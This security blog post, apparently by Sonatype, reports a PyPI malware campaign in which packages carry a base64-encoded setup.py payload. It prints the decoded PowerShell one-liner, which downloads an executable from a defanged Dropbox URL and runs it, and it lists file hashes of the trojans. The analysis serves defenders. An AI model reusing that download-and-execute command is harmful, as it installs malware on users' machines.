Attacker Floods PyPI With 1000s of Malicious Packages That Drop Windows Trojan via Dropbox

February 26, 2023 By Ax Sharma

3 minute read time

Sonatype has been tracking an open source malware campaign developing over the weekend in which a threat actor is infiltrating the PyPI software registry with thousands of malicious packages. These packages are being rapidly removed by the PyPI admins as they come up, but the behavior continues well into today.

The reports of this activity were first brought to our notice by security researcher Félix Aimé.   

Downloads Windows trojan from Dropbox

We observed hundreds of packages getting published and removed in batches on the PyPI registry. These packages, despite containing contextual terms like “libs,” “nvidiapaypalsuper,” and so on, are named quite arbitrarily. All of them contain the description, “A library for creating a terminal user interface.”

Screenshot of the download interface showing six different packages with the description "A library for creating a terminal user interface."

Although these packages are rapidly being purged as they appear on PyPI, Sonatype’s malware archives continue to retain copies of these malicious artifacts.

Based on our analysis, these packages contain identical payload targeting Windows users, as shown below.

The ‘setup.py’ (manifest file) within these packages contains a one-liner payload which is base64-encoded:

Screenshot of the 'setup.py' (manifest file) within the packages that contains the one-liner payload.
The malicious code (line 9) in question invokes a PowerShell command on an infected Windows machine to download second-stage infection from a Dropbox URL:

powershell Invoke-WebRequest -Uri "hxxps://dl.dropbox[.]com/s/szgnyt9zbub0qmv/Esquele.exe?dl=0" -OutFile "~/WindowsCache.exe"; Invoke-Expression "~/WindowsCache.exe"

Thankfully, at the time of our analysis, Dropbox has suspended the offending URL, although we were still able to obtain the malicious copies of the executable from another source:

Screen shot of what the malware looks like when executed.

The malicious EXEs (IOCs below) being downloaded by the illicit packages are Windows trojans with potential spyware and info-stealing code:

  • WindowsCache.exe:
    8ab8ddfa3f61334cf9386b62aea3a761852b3d785d9f21b8a638cc42b0af7afd [VirusTotal]
  • update.exe:
    51162376051669cbf4d2b11b1300ba7be6758ca0ca1979ce736fe70ae7289bc2 [VirusTotal]

The threat actor publishing these packages calls themselves 'EsqueleSquad’ and interestingly has mentioned their email address and website, “www.esquelesquad[.]rip” within these packages:

A screenshot of the message that 'EsqueleSquad' uses to direct people to their email address and website. A black background with red font that reads "EsqueleSquad Doxes Tools Help".

It is still not clear what purpose the threat actor is trying to achieve, mainly because despite containing working malicious payload, the packages are named in a confusing manner with no obvious targets. The malicious influx of packages in batches is continuing at the time of writing and our researchers continue to monitor the situation.

In late 2022, threat actors had flooded the PyPI and npm registries with over 200 cryptominers. In early 2021, we saw more than 5,000 dependency confusion packages infiltrating both open source registries.

Users of Nexus Firewall can rest easy knowing that such malicious packages would automatically be blocked from reaching their development builds.

Tags: vulnerabilities, PyPI, featured, Malware Analysis

Written by Ax Sharma

Ax is a Security Researcher at Sonatype and Engineer who holds a passion for perpetual learning. His works and expert analyses have frequently been featured by leading media outlets. Ax's expertise lies in security vulnerability research, reverse engineering, and software development. In his spare time, he loves exploiting vulnerabilities ethically and educating a wide range of audiences.